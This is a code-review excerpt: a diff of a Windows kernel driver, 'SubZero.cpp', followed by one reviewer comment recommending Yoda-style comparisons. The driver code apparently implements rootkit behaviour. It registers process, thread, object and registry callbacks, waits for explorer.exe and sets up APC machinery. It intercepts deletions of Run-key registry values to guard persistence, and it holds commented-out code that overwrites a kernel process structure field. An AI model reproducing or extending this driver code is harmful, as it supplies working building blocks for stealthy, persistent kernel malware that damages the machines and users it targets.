Project/SubZeroDriver/SubZero.cpp

```diff
@@ -0,0 +1,456 @@
+		if (!NT_SUCCESS(status)) {
+			KdPrint((DRIVER_PREFIX "[-] Failed to set Thread callbacks (status=status=%08X)\n", status));
+			break;
+		}
+	} while (false);
+	
+	if (!NT_SUCCESS(status)) {
+		if (symLinkCreated)
+			::IoDeleteSymbolicLink(&symLink);
+		if (DeviceObject)
+			::IoDeleteDevice(DeviceObject);
+	}
+
+	// Initialize RundownProtection for APCs
+	::ExInitializeRundownProtection(&g_Globals.RundownProtection);
+
+	// Search for explorer Process
+	PEPROCESS explorerProcess;
+	LARGE_INTEGER interval;
+	interval.QuadPart = -50000000; // 5 Seconds / 100 nanoseconds - in RELATIVE time
+	do {
+		if (::FindProcessByName(PARENT_PROCESS_NAME, &explorerProcess)) {
+			g_Globals.ExplorerPID = ::HandleToULong(::PsGetProcessId(explorerProcess));
+			KdPrint((DRIVER_PREFIX "[+] explorer.exe found. PID: %d\n", g_Globals.ExplorerPID));
+			//ChangeVadEntryProtection(explorerProcess, NULL, 0);
+			break;
+		}
+		else { 
+			KdPrint((DRIVER_PREFIX "[-] explorer.exe not found. Trying again in 5 seconds\n"));
+			::KeDelayExecutionThread(KernelMode, false, &interval); }
+	} while (true);
+
+	//::InterlockedExchange((volatile LONG*)((uintptr_t)explorerProcess + 0x3e8) , 1);
+	//KdPrint((DRIVER_PREFIX "[+] explorer.exe PID changed.")); 
+
+	DriverObject->DriverUnload = SubZeroUnload;
+	DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverObject->MajorFunction[IRP_MJ_CLOSE] = SubZeroCreateClose;
+	return status;
+}
+
+void SubZeroUnload(PDRIVER_OBJECT DriverObject) {
+	// unregister Process & Thread notifications in case of an error
+	::PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, TRUE);
+	::PsRemoveCreateThreadNotifyRoutine(OnThreadNotify);
+
+	// unregister object & registry notifications
+	::ObUnRegisterCallbacks(g_Globals.ObjectRegistrationHandle);
+	::CmUnRegisterCallback(g_Globals.RegistryRegistrationCookie);
+
+	// Wait for KAPC to finish in case of an error
+	::ExWaitForRundownProtectionRelease(&g_Globals.RundownProtection);
+
+	// Delete device
+	UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\" DRIVER_NAME);
+	::IoDeleteSymbolicLink(&symLink);
+	::IoDeleteDevice(DriverObject->DeviceObject);
+
+	KdPrint((DRIVER_PREFIX "[+] Driver unloaded successfully\n"));
+}
+
+NTSTATUS SubZeroCreateClose(PDEVICE_OBJECT, PIRP Irp) {
+	Irp->IoStatus.Status = STATUS_SUCCESS;
+	Irp->IoStatus.Information = 0;
+	IoCompleteRequest(Irp, 0);
+	return STATUS_SUCCESS;
+}
+
+NTSTATUS OnRegistryNotify(PVOID, PVOID Argument1, PVOID Argument2) {
+	REG_DELETE_VALUE_KEY_INFORMATION* deleteValueInfo;
+	PCUNICODE_STRING name;
+
+	switch ((REG_NOTIFY_CLASS)(ULONG_PTR)Argument1) {
+	case RegNtPreDeleteValueKey:
+
+		deleteValueInfo = (REG_DELETE_VALUE_KEY_INFORMATION*)Argument2;			
+		if (NT_SUCCESS(::CmCallbackGetKeyObjectIDEx(&g_Globals.RegistryRegistrationCookie, deleteValueInfo->Object, nullptr, &name, 0))) {
+			
+			// filter out key deletions
+			if (::wcsncmp(name->Buffer, REG_MACHINE REG_RUN_KEY_PATH, ARRAYSIZE(REG_MACHINE REG_RUN_KEY_PATH) - 1) == 0) {
```

Comment:
Use YODA notations for safety:
`if (0 == ::wcsncmp(name->Buffer, REG_MACHINE REG_RUN_KEY_PATH, ARRAYSIZE(REG_MACHINE REG_RUN_KEY_PATH) - 1) ) {`